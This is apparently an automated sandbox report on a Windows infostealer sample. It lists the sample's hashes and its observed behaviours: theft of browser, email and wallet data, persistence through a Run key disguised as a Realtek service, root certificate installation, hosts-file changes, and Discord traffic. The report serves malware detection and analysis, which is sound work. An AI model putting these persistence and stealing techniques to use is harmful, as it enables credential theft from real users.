544e7e6b6893fa07a4fa3fa457a48723a8f51c404077a27bd25c736cf4df4fc7

Analysis

max time kernel
150s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
21-05-2024 19:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe
Size

9.5MB
MD5

07509e7bfdeb2027d021b7f98539c040
SHA1

67603029c5b092bcc39fac5187d6f3cf93233cb6
SHA256

544e7e6b6893fa07a4fa3fa457a48723a8f51c404077a27bd25c736cf4df4fc7
SHA512

1081ffc6af19d6cef2f12b06b9afc73f85db620440d9ec623fcdf14bb35b5b1668e7ee59cf73081618ad9bc1be758ee673e97400b5e34961d1eeae2d76235790
SSDEEP

98304:t25Y4P6vABpwXgOlx8UJEZMFCEd+MFQlpM3:zW6vA8d8UJE+FPdspM3

Score

8^/10

execution persistence spyware stealer

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

4920 powershell.exe
3972 powershell.exe

pid	process
4920	powershell.exe
3972	powershell.exe

Drops file in Drivers directory 3 IoCs

Processes:

attrib.exeattrib.exe07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe

description	ioc	process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Protect\\SecurityHealthSystray.exe"	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

12 discord.com
11 discord.com
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

3 api.ipify.org
4 api.ipify.org
9 ip-api.com

flow	ioc
12	discord.com
11	discord.com

flow	ioc
3	api.ipify.org
4	api.ipify.org
9	ip-api.com

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe

Detects videocard installed 1 TTPs 2 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

wmic.exewmic.exe

pid process

2072 wmic.exe
3028 wmic.exe
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.

Processes:

description flow ioc

HTTP User-Agent header 10 Go-http-client/1.1

pid	process
2072	wmic.exe
3028	wmic.exe

description	flow	ioc
HTTP User-Agent header	10	Go-http-client/1.1

Modifies system certificate store 2 TTPs 6 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0400000001000000100000003e455215095192e1b75d379fb187298a0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c99140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b9992367f000000010000000c000000300a06082b060105050703097a000000010000000c000000300a06082b060105050703097e00000001000000080000000000042beb77d501030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c190000000100000010000000a823b4a20180beb460cab955c24d7e21200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 5c000000010000000400000000080000190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c7e00000001000000080000000000042beb77d5017a000000010000000c000000300a06082b060105050703097f000000010000000c000000300a06082b060105050703091d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c990b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b060105050703080f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d0400000001000000100000003e455215095192e1b75d379fb187298a200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exepowershell.exepowershell.exe

pid	process
4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe
4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe
4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe
4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe
4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe
4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe
3972	powershell.exe
4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe
4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe
3972	powershell.exe
4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe
4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe
4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe
4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe
4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe
4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe
4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe
4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe
4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe
4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe
4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe
4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe
4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe
1256	powershell.exe
4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe
4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe
4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe
4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe
4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe
1256	powershell.exe
4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe
4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe
4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe
4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe
4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe
4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe
4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe
4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe
4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe
4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe
4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe
4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe
4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe
4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe
4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe
4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe
4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe
4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe
4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe
4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe
4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe
4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe
4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe
4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe
4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe
4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe
4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe
4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe
4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe
4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe
4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe
4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe
4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe
4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exewmic.exewmic.exe

description	pid	process
Token: SeDebugPrivilege	4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe
Token: SeIncreaseQuotaPrivilege	3192	wmic.exe
Token: SeSecurityPrivilege	3192	wmic.exe
Token: SeTakeOwnershipPrivilege	3192	wmic.exe
Token: SeLoadDriverPrivilege	3192	wmic.exe
Token: SeSystemProfilePrivilege	3192	wmic.exe
Token: SeSystemtimePrivilege	3192	wmic.exe
Token: SeProfSingleProcessPrivilege	3192	wmic.exe
Token: SeIncBasePriorityPrivilege	3192	wmic.exe
Token: SeCreatePagefilePrivilege	3192	wmic.exe
Token: SeBackupPrivilege	3192	wmic.exe
Token: SeRestorePrivilege	3192	wmic.exe
Token: SeShutdownPrivilege	3192	wmic.exe
Token: SeDebugPrivilege	3192	wmic.exe
Token: SeSystemEnvironmentPrivilege	3192	wmic.exe
Token: SeRemoteShutdownPrivilege	3192	wmic.exe
Token: SeUndockPrivilege	3192	wmic.exe
Token: SeManageVolumePrivilege	3192	wmic.exe
Token: 33	3192	wmic.exe
Token: 34	3192	wmic.exe
Token: 35	3192	wmic.exe
Token: 36	3192	wmic.exe
Token: SeIncreaseQuotaPrivilege	3192	wmic.exe
Token: SeSecurityPrivilege	3192	wmic.exe
Token: SeTakeOwnershipPrivilege	3192	wmic.exe
Token: SeLoadDriverPrivilege	3192	wmic.exe
Token: SeSystemProfilePrivilege	3192	wmic.exe
Token: SeSystemtimePrivilege	3192	wmic.exe
Token: SeProfSingleProcessPrivilege	3192	wmic.exe
Token: SeIncBasePriorityPrivilege	3192	wmic.exe
Token: SeCreatePagefilePrivilege	3192	wmic.exe
Token: SeBackupPrivilege	3192	wmic.exe
Token: SeRestorePrivilege	3192	wmic.exe
Token: SeShutdownPrivilege	3192	wmic.exe
Token: SeDebugPrivilege	3192	wmic.exe
Token: SeSystemEnvironmentPrivilege	3192	wmic.exe
Token: SeRemoteShutdownPrivilege	3192	wmic.exe
Token: SeUndockPrivilege	3192	wmic.exe
Token: SeManageVolumePrivilege	3192	wmic.exe
Token: 33	3192	wmic.exe
Token: 34	3192	wmic.exe
Token: 35	3192	wmic.exe
Token: 36	3192	wmic.exe
Token: SeIncreaseQuotaPrivilege	2072	wmic.exe
Token: SeSecurityPrivilege	2072	wmic.exe
Token: SeTakeOwnershipPrivilege	2072	wmic.exe
Token: SeLoadDriverPrivilege	2072	wmic.exe
Token: SeSystemProfilePrivilege	2072	wmic.exe
Token: SeSystemtimePrivilege	2072	wmic.exe
Token: SeProfSingleProcessPrivilege	2072	wmic.exe
Token: SeIncBasePriorityPrivilege	2072	wmic.exe
Token: SeCreatePagefilePrivilege	2072	wmic.exe
Token: SeBackupPrivilege	2072	wmic.exe
Token: SeRestorePrivilege	2072	wmic.exe
Token: SeShutdownPrivilege	2072	wmic.exe
Token: SeDebugPrivilege	2072	wmic.exe
Token: SeSystemEnvironmentPrivilege	2072	wmic.exe
Token: SeRemoteShutdownPrivilege	2072	wmic.exe
Token: SeUndockPrivilege	2072	wmic.exe
Token: SeManageVolumePrivilege	2072	wmic.exe
Token: 33	2072	wmic.exe
Token: 34	2072	wmic.exe
Token: 35	2072	wmic.exe
Token: 36	2072	wmic.exe

Suspicious use of WriteProcessMemory 32 IoCs

Processes:

07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exepowershell.execsc.exe

description	pid	process	target process
PID 4600 wrote to memory of 852	4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe	attrib.exe
PID 4600 wrote to memory of 852	4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe	attrib.exe
PID 4600 wrote to memory of 2540	4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe	attrib.exe
PID 4600 wrote to memory of 2540	4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe	attrib.exe
PID 4600 wrote to memory of 3192	4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe	wmic.exe
PID 4600 wrote to memory of 3192	4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe	wmic.exe
PID 4600 wrote to memory of 2072	4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe	wmic.exe
PID 4600 wrote to memory of 2072	4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe	wmic.exe
PID 4600 wrote to memory of 3972	4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe	powershell.exe
PID 4600 wrote to memory of 3972	4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe	powershell.exe
PID 4600 wrote to memory of 3992	4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe	wmic.exe
PID 4600 wrote to memory of 3992	4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe	wmic.exe
PID 4600 wrote to memory of 4504	4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe	wmic.exe
PID 4600 wrote to memory of 4504	4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe	wmic.exe
PID 4600 wrote to memory of 3028	4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe	wmic.exe
PID 4600 wrote to memory of 3028	4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe	wmic.exe
PID 4600 wrote to memory of 1256	4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe	powershell.exe
PID 4600 wrote to memory of 1256	4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe	powershell.exe
PID 4600 wrote to memory of 1540	4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe	wmic.exe
PID 4600 wrote to memory of 1540	4600	07509e7bfdeb2027d021b7f98539c040_NeikiAnalytics.exe	wmic.exe
